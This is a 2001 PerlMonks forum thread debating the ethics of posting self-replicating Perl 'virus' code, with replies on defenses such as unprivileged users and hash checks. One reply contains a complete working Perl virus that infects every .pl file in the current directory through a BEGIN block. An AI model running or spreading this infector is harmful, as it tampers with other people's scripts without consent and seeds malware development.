Beefy Boxes and Bandwidth Generously Provided by pair Networks
Do you know where your variables are?
 
PerlMonks  

Morality of posting Perl "virus" code?

by tachyon (Chancellor)
on Jun 27, 2001 at 19:06 UTC ( #91940=perlmeditation: print w/replies, xml ) Need Help??

chromatic posted an obfucation here Seekers of Perl Obfuscation that demonstrates some very interesting behaviour of SEEK when used on the <DATA> handle. While deconstructing this it struck me that this could very well be used to generate self modifying script code and what better to use as a proof of concept than a virus.

Now a perl virus is not really the same as a .exe virus in that the source is in plain view and *nix permissions prevent a lot of random file tampering by malicious code. Still I am troubled by the morality of posting such code. Is this immoral, ammoral or does it have an interesting moral of some practical use?

I could imagine using this to modify the configuration variables of a script automatically for instance so that the script automatically hard codes its configuration rather than using external files.

Code has been removed by author.

cheers

tachyon

Replies are listed 'Best First'.
(tye)Re: Immoral?
by tye (Sage) on Jun 27, 2001 at 19:20 UTC

    I don't find this code paricularly interesting and don't think encouraging people to look in this direction is a good idea. I'd rather you had just kept the code to yourself or found something more useful to spend your time on.

    I find that these types of things are usually built up in stages and someone getting the idea to write a Perl virus and then actually going all the way to creating a non-trivial, mallicious virus is rather unlikely. But one person getting it started and then another adding to it, etc. is quite likely to end up with someone eventually producing something that I'd much rather never get produced. Part of the reason for this is that each little step along the way is a much easier moral decision based on the existance of the previous work.

    I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

    I'd appreciate having this not be approved for its section and having the code removed from it. While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

    (updated to add "code" to the first line. Thanks to jepri for noting that I was not being clear there.)

            - tye (but my friends call me "Tye")
      I do agree -- having a Perl virus developed may be hazardous. However, I also feel there are two sides of the story.

      Virii have been a problem for some time, and have been developed in all sorts of languages. There are already PHP viruses. With that in mind, it would seem likely that eventually, someone would write a virus in Perl, it's just a matter of when.

      I don't feel that security by "ignoring it and hoping it goes away" would be a good long term solution. Is there anything that could ever be done to prevent a Perl virus from running? I don't really know. However, I would much rather have this opportunity to discuss the matter with the reasonable, intelligent people who frequent this site (not to be confused with "reasonably intelligent people", found at various other sites ;-), then run around trying to clean up the mess after it happens in the future, and THEN having this discussion :-)

      So opening things wide open -- is there anything that could be done with Perl to prevent a Perl virus from doing damage? It seems extremely difficult, and I don't know any other language that has figured out a way around this. But if any language could develop a system to aid in prevention, it would be Perl!

      tye, I'm not dissagreeing with you per-se. I suppose that I just feel that since it's going to happen anyway, that perhaps it would be easier to attempt to deal with the issue now. I'm just glad it was a monk offering code up for review, and not one of my users trying it out on my system. But perhaps this should be a non-public discussion -- I'll leave that up to you guys :-)
      -Eric

      Update: BTW, is there a system for non-public discussion on this site? Password protected forums, forums that require a particular level, etc?

      Update 2: After seeing lemming's post, I changed all referenced of "virii" to "viruses", which is apparently the correct usage. Thanks Lemming :-)
                Is there anything that could ever be done to prevent a Perl virus from running?

        Well, I would like to offer my suggestions.
        • Make an unprivileged user and call it "scriptGuy" or something
        • Remove all of that users privileges everywhere, and I mean EVERYWHERE.
        • Begin restoring privileges to that user on a need-by-need basis until it becomes a semi-usable account
        • Run all scripts as that user
        • Never run code found in the wild without understanding it or, at least, trusting the source from which it came
            Now, this discussion is going to easily turn into a general discussion on computer security (i.e. shut off ftp and telnet, use ipchains, etc., etc.). But, that might not be such a bad discussion to have.

        Jeremy

        To clarify, discussing viruses and even producing a virus can be important research. Releasing the code to the world as part of the research is a big mistake in my book. It is the inclusion of the code that I object to, especially in a public place such as this.

        And I'm not claiming that hiding this one bit of code will stop the creation of viruses. I am worried that not hiding it could cause the creation of a virus. That is, speed up the creation of a virus or increase the number of such viruses.

        This is not a security measure. This is a moral decision to not contribute to the creation of a virus. Sure, think about it and talk about it, but don't hand out seeds to the world. Sure, some virus will probably come along eventually but I don't want to have had a hand in its developoment!

        (updated)

                - tye (but my friends call me "Tye")
      I waited a day to see if I felt the same way about what you have said - I do. On the one hand you casually dismiss the very idea with a handwave ('I don't find this particularly interesting') and yet you want it removed because you think it promotes the creation of "malware". That isn't interesting? Hmmmm, well, why teach anyone to program, then? You never know how the potential miscreants might use that skill later on!

      I have always believed that attempts to hide knowledge from others are far worse than what someone might do with that knowledge. The dirtbags of this world often depend on the ignorance and naivete of others in order to accomplish their dirty deeds.

      I see that tachyon has been pressured into removing the code. I wish he would restore it. I don't see that there is any need for censorship of anything put in this forum that was part of an honest attempt to discuss a Perl issue.

              I do find releasing malware seeds to the world to be exactly that.

          I don't know. To me, that seems akin to the old mantra "security through obscurity." That is, the "don't-talk-about-it-so-people-won't-think-about-it" kind of mentality always seems to backfire. I, for one, am intrigued by this post; but certainly not in a malicious sense. I am interested because in order to solve problems (if we would want to classify this as such), you must identify the problem and provide proof of concept, which is what tachyon did.
          To me, the real discussion should now become "how providing solutions to this problem". We should discuss making sure non-privileged users (or lowest neccesary priveleged users) are running Perl scripts. We should talk about verifying code found "in the wild" before running it, etc. Then, after coming up with a way to prevent this sorta thing from happening, we can return to the original problem and see if we can get around the solution we came up with.
          Do you disagree with BugTraq? They often talk about and provide proofs of concept for code and techniques that could easily be maliciously employed.
          In the end, to me, this could be turned into a very valuable discussion. Granted, the code could be modified in such a way to only provide proof of concept rather than executing that concept at all. But, I find nothing wrong with it.

      Jeremy

        When I've seen malwarish code distributed by security resources, it has always been at least one of these:

        • Already in the wild
        • Solutions to thwart it are already available
        • The code has been very carefully modified to introduce several subtle bugs
        • It is intentionally very vague, intentionally leaving out some key ideas required to make it work
        • It is a reaction to some other organization not dealing with a security issue in a manner that was considered acceptable by the distributor of the malware
        And this last item I find close to the concept that "cracking is good because it gets people to increase their security". Although I think that you can do some very careful cracking to bring home a point about a lack of security, I find it immoral to do damage while doing that. And handing out tools that can be used by others who probably don't agree with me on that is not a good idea in my book.

        I never said "don't talk about it". I don't find the working code very interesting. The concept is simple enough that I don't think the working code adds much to it. To stop such a virus you need to prevent/detect modifications to files. The details about how the modifications are done are mostly irrelevant and concentrating too much on them gets you a solution that isn't robust anyway.

        It is like untainting variables by trying to think up which characters you want to exclude. You are bound to miss some. Instead, specify which characters that you know aren't going to be a problem. For a virus, you need to figure out ways that scripts can be modified safely and how to prevent/detect all other modification, not just the modification methods highlighted by a proof of concept.

                - tye (but my friends call me "Tye")
      While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

      I must disagree. Morality (to me at least) depends on intent. You said above that researching malware is not immoral, well, if someone is doing that research to make a virus with mal-intent, I find that immoral. But, in tachyon's case, if he is researching inorder to help, well I don't think that's immoral. Tachyon certainly did not 'release malware seeds to the world' so that the world would be worse off, he did it for quite the opposite reason. It's really a phillosophy here that I'm arguing over. It comes down to this: does the end justify the means or do the means justify the end? Personally, I believe the latter to be the case.

      I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

      Again, I must humbly disagree. If we can maturely discuss these issues, then mabey we can find a way to stop a perl virus. Your argument is one for ignorance, believing that ignorance is bliss. Well, it may be, but not after someone makes a perl virus and your faced with it anyway. I say it is much better to find out now, in a controlled enviornment; where we all are intellegent people with good intents.

      The 15 year old, freshman programmer,
      Stephen Rawls

        I don't claim that tachyon's intent was to encourage the production of malware. I claim that what he did is likely to do that and so is an immoral act. Whether his intend was immoral is a different question. He seemed to have moral qualms about the act. I wish he had listened more to his conscience. (:

        Again, I'm not saying we should avoid discussing it.

                - tye (but my friends call me "Tye")
(ichimunki) Re: Immoral?
by ichimunki (Priest) on Jun 27, 2001 at 20:10 UTC
    This code (at least what I saw before it was removed) was not the most complicated Perl in the world. And from what I understood of it, the virus was painfully obvious. It was certainly clearly written and documented. Imagine the same thing in obfuscated form, that didn't simply insert itself at the top of a script where you can see it.

    I don't think posting this code is immoral, and I think censoring the discussion is. Imagine if SecurityFocus incident reports were as crippled as the above discussion. The exploit description would be worthless, since only those in the "inner circle" would even know what was happening.

    That said, I find this interesting because it raises the question of how to defend against this. Given crackings at places like SourceForge, is it so hard to imagine trojaned scripts out there?

    Nothing I could come up with off the top of my head would be surefire, but is there a way to embed an MD5 hash into a script and perhaps use a module to test the script against the hash and exit on non-validation?
    #/usr/bin/perl -wT use strict; print "Hello, world!\n";
    run hello.pl through validatination.pl to get
    #/usr/bin/perl -wT use strict; #example of MD5 protection use Validate::MD5; print "Hello, world!\n"; #not a real hash this is off the top of my head __HASH__ 1A2E8584399E234F290C
      If you're concerned about someone editing your scripts, you sure don't want to put a hash in them. You'd want it somewhere else, so if the script were compromised, the hash could detect it.
Re: Immoral?
by pmas (Hermit) on Jun 27, 2001 at 20:16 UTC
    I agree with you, fellow monks.

    I ++ tachyon for creating smart code (which I cannot see, but sure it is), and ++ tye for hiding it from me - in 15 minutes after it was posted. But - it was posted for full 15 minutes!

    I am sure it will be interesting to see the code, but I agree with andreychek there should by non-public place to discuss these things.

    Most experienced monks are "saints" for a reason. They will not do harm even if they can. Less experienced malicious perl coder may be here lurking around. Do not provide him a tool to do wrong. Let him earn experience - when he will be able to build a virus, hopefully he will be saint and will not want to do it.

    Updated

    So from now on, I should be scared to install any perl module, because I always need to analyze it if it does not contain perl source-code virus? Can I hope that CPAN testers will be able to catch virus posted in CPAN site?

    Maybe smart saint monks might to get together, analyze virus, analyze virus cleaner, and put together some script parser to check for known virus concepts, and also some heuristic search for tricks possibly being used, to give me a warning which lines are suspicious?

    I was just looking for a module on ActiveState site. Now I will do it anyway, but I definitely will read the source code - and learn something...

    So I need to be concerned with tricks including SEEK and <DATA>, right?

    pmas

    To make errors is human. But to make million errors per second, you need a computer.

      So I need to be concerned with tricks including SEEK and <DATA>, right?

      Wrong. Virusses can be "implanted" in many ways, not needing <DATA> or seek. Here's some code I posted to Usenet several years ago; if you run it, it will try to infect all files ending in ".pl" in the current directory. It won't do anything but try to replicate itself. It does its business from a BEGIN block, so even running it with -c cause replication.

      #!/opt/perl/bin/perl -w use strict; # HACKED BEGIN { local *ME; if (open ME, $0) { local $/; my $me = <ME>; my ($text) = $me =~ /(# HACKED\n.*?# HACKED\n)/s; if (opendir DIR, ".") { foreach my $file (readdir DIR) { next unless $file =~ /.pl$/; local *FILE; if (open FILE, "+< ./$file") { my $program = <FILE>; unless ($program =~ /# HACKED/) { $program =~ s/\n/\n$text/; } seek FILE, 0, 0; print FILE $program; } close FILE; } } closedir DIR; } close ME; } # HACKED __END__

      -- Abigail

        Not to pick a nit (I agree with your general point) but the above code *does* use seek... around line 20 you have
        seek FILE, 0, 0; print FILE $program;

        -Blake

      pmas, I think you did a good job at summing things up.

      Let me be a devil's advocate for a moment. My question is -- where exactly does the point lie where code becomes a hazard? The code originally written on this could modify perl scripts in the current directory, and it was removed because it was deemed dangerous.

      Now, where exactly is the line drawn that seperates code that is "okay" from something that should not be posted? In this case, the code was drawn up in the first place due to this post, by chromatic. In fact, chromatic's original post was rated quite high (and yes, I had to use a vote on it right now to figure that out ;-) Nobody seemed to object to that particular post.

      The code in this post was removed because it gave a working example of how to create something virus-like. But by leaving Chromatic's post, aren't we saying that it's fine to write a virus, here's how to get started, we just aren't going to show you the exact code.. meaning that the person has to be at a particular skill level to make it work. So in essance, it would seem as if we are leaving virus writting for the more skilled Perl programmers, and simply keeping the script kiddies off the street for the moment.

      Again, I'm saying all of this as devil's advocate. However, the question I am posing is this-- how do we know when to remove code? What if what was posted could be used for good as well as bad, is it worth keeping it then? What if self modifying code could be used as a fancy form of "perl -i blah"? What if "perl -i blah" could be used as a virus? Just some thoughts to ponder :-)
      -Eric
        A three-month Perl programmer could write a program that adds similar 'viral' code to all of the Perl programs or modules or CGI scripts in the current directory. The biggest thing tachyon does differently is to use *DATA to store the code and seek to rewind the pseudo file.

        Anyone who's capable of writing code that will search for files with a particular extension, open the file and insert a varying number of lines after the first line of each file is capable of writing something similar. Most people here could have done that within a few weeks of learning Perl. Several could have done that in their first week.

        That's not to say there are better examples tachyon could have chosen :), but does his code give someone a grand weapon of ferocious power? No. We already have that. It's called Perl.

Re: Morality of posting Perl "virus" code?
by lemming (Priest) on Jun 28, 2001 at 03:14 UTC

    I used to work for one of the antivirus companies. So I do know a bit about viruses, but am by no means an expert. I didn't do much deconstruction work, except on Unix.

    A lot of the viruses out in the wild now are viruses that started out as a proof of concept and then somebody else ran with it. (See Concept & Melissa for examples). Trojans are probably a bigger threat in my opinion, but the definitions have intertwined over the years.

    I'm against posting virus code even if it's harmless. It can inspire an otherwise unoriginal script kiddie to release what was before in a out of the way place. It can also have legal consequences. I'd rather not open up perlmonks to that sort of exposure. We can talk about it and I'd even go for posting snippets of code that is considered dangerous, but to post a full working program is wrong. Plus I'd hate to see the next McAfee/Symantec press release.

    Some bits:

  • It's viruses, not virii language.perl.com
  • Most languages can be used to write a virus, I've seen shell scripts to man pages contain viral code.
Re: Morality of posting Perl "virus" code?
by da (Friar) on Jun 28, 2001 at 01:44 UTC
    Damian Conway wrote a self-modifying program called "SelfGOL" which also uses seek on the <DATA> handle, in a similar manner (I believe; it's pretty obfuscated code, and I haven't yet seen the talk where he explains it).

    However, the code is easy to locate on the web. If somebody wants to use seek with __DATA__ they've had quite a while to figure out how.

    Personally, I think a perl virus is much less worrying than a compiled executable virus for the obvious reasons, but the topic is intellectually fascinating.

    Here's his description of the talk:

    _______________________

    Extreme Perl -- The Horror That Is SelfGOL

    In this talk I dissect the SelfGOL program: an obfuscated, self-aware, viral quine that can:

    • self-replicate,
    • rewrite other Perl programs to allow them to self-replicate,
    • detect un-rewritable Perl programs,
    • execute itself or other Perl programs as cellular automata of arbitrary size (to play Conway's "Game of Life"),
    • animate any short text as a cycling marquee banner.

    SelfGOL accomplishes these feats in under 1000 bytes of standard Perl, without importing any modules, and without using a single if, unless, while, until, for, foreach, goto, next, last, redo, map, or grep.

    To do all that in under 1K of code, it relies on some extreme programming techniques, and on many of the obscure backwaters of the Perl syntax. This talk explores both.

    _______________________

    He's coming to boston.pm in less than two weeks; if we're lucky he may do this talk.

    ___
    -DA

code restored (Re: Immoral?)
by tye (Sage) on Jun 27, 2001 at 20:52 UTC

    After more time for people to weigh in on the subject, the tally is roughly evenly divided on whether the code should stay hidden.

    As one of the editors, a 50/50 split is certainly not enough of a mandate to get me to "edit" a node, so I have undone my temporary changes to the node.

    I've submitted this to Nodes to consider so that high-level monks can vote on whether they think the code should remain. This vote is really for informational purposes only as the reputation on the node is fairly positive and so it very unlikely to be deleted (and will be restore even if that happens) and I seriously doubt there will be enough of a mandate to warrant changes by one of the editors. But I'm curious what the numbers from this informal poll will be. Think of it as a way to take a side without having to write a whole node. I apologize that lower-level monks will not be able to participate -- that is what happens when I abuse features of the site for things that they weren't intended. (:

            - tye (but my friends call me "Tye")

      Soon after this my view of the (informal, unscientific) tally (involving node reputations, Nodes to consider votes, and public and private comments to me) started to shift and I now place it somewhere between 3-to-1 and 7-to-1 in favor of not removing the code.

      Even if the tally had ended up being close to 50/50, I would not repeat the temporary removal of viral code. Not that I regret what I did. This was "a first" in some ways and I asked before acting but acted quickly to make temporary changes that I thought were important. I think part of my motivation was tachyon's own words: "Still I am troubled by the morality of posting such code."

      I also have not changed my mind about seemingly innocent but working code with viral features making it easier for malware to be produced, at least as much for allowing the steps toward malware to be small enough that they are easy to justify as not immoral as for just getting the ball rolling in terms of curiosity, motivation, and a code base.

      Anyway, I wanted it to be clear that I won't be doing that for "dangerous" code again. I'll may well /msg the author encouraging them to change their mind, though. (:

              - tye (but my friends call me "Tye")
Re: Immoral? (boo)
by boo_radley (Parson) on Jun 27, 2001 at 20:35 UTC
    I normally don't follow votes up with posts, but this strikes me as an incredibly bad idea, and I've --ed it accordingly.
    I acknowledge that almost any modern programming language is capable of being viral, I'd really hate to see anything like this spread. I also have to acknowledge that just by seeing this in a public environment means that it's already spread.
    Even if you meant it in fun, this was a bad idea.
Re: Morality of posting Perl "virus" code?
by shotgunefx (Parson) on Jun 28, 2001 at 02:00 UTC
    While these is a really fascinating subject with some actual potential "good" uses, I have to agree with tye in the face that most hackers are just "script kiddies" who change a line or two and then we havesomething to worry about.

    I'm not suggesting that these subjects are not discussed, but perhaps it would be best not to be posting working examples. Even if the principles where demonstrated through unrelated code fragments, this would deter, I think, a lot of the "coding challenged" little turds who have nothing better to do than try and break stuff.

    Personally, I think a much larger threat is the downloading of modules from CPAN. I have a feeling that a lot of admins and programmers don't have the time or inclination to do a code review of every module they use.

    -Lee

    "To be civilized is to deny one's nature."
Re: Immoral? Warning: Virus code still visible!
by pmas (Hermit) on Jun 27, 2001 at 20:33 UTC
    Please remove virus code! It is posted also in answer to original obfuscation (I do not want to link it from here).

    pmas

    To make errors is human. But to make million errors per second, you need a computer.

      I checked it again. Virus code was removed from original posting, but I believe valid viral code is still openly posted in an answer to obfuscation. I posted a warning that virus is still avalable to dowload for anybody, and I get downvoted for this post.

      I assume it is from virus hackers - for dis-service for malicious hackers community?.. :o)

      It will be interesting to find out who downvoted me, and for what reason.

      pmas

      To make errors is human. But to make million errors per second, you need a computer.

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: perlmeditation [id://91940]
Approved by root
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others imbibing at the Monastery: (4)
As of 2020-11-25 11:22 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found

    Notices?